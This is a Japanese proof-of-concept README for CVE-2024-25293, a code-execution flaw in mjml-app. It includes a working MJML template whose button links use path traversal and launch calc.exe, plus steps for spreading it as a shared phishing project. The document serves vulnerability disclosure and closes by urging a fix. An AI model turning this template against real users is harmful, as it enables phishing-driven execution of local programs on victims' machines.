
CVE-2024-25293 脆弱性の Proof-Of-Concept です。
mjml-app v3.0.4 & 3.1.0-beta には、リモートコード実行 (RCE) が含まれることが発見されました。
このリポジトリには、脆弱なアプリケーションのサンプルと、それに対する Proof-Of-Concept (POC) エクスプロイトがあります。

ステップ 1) 攻撃者は 'href' タグを持つ 'mj-button' を作成し、
<mjml>
<mj-body>
<mj-section>
<mj-column>
<mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
<mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
</mj-column>
</mj-section>
</mj-body>
</mjml>

ステップ 2) 攻撃者は次のコードを使用してメインのフィッシングプロジェクトを作成します。
<!-- header.mjml -->
<mj-section>
<mj-column>
<mj-text>This is a demo jruru</mj-text>
</mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

ステップ 3) 被害者が共有プロジェクトを開いてボタンをクリックすると、ペイロード (calc、notepad など) の実行がトリガーされます。

アプリケーション内で href タグを通じて exe ファイルを実行することは危険であり、パストラバーサルと組み合わせてファイルを実行することはセキュリティ上の問題です。これにより、ローカルファイルを実行するためのフィッシングプロジェクトが作成・配布される可能性があります。したがって、このような実行を防ぐために、この機能を修正することが不可欠です。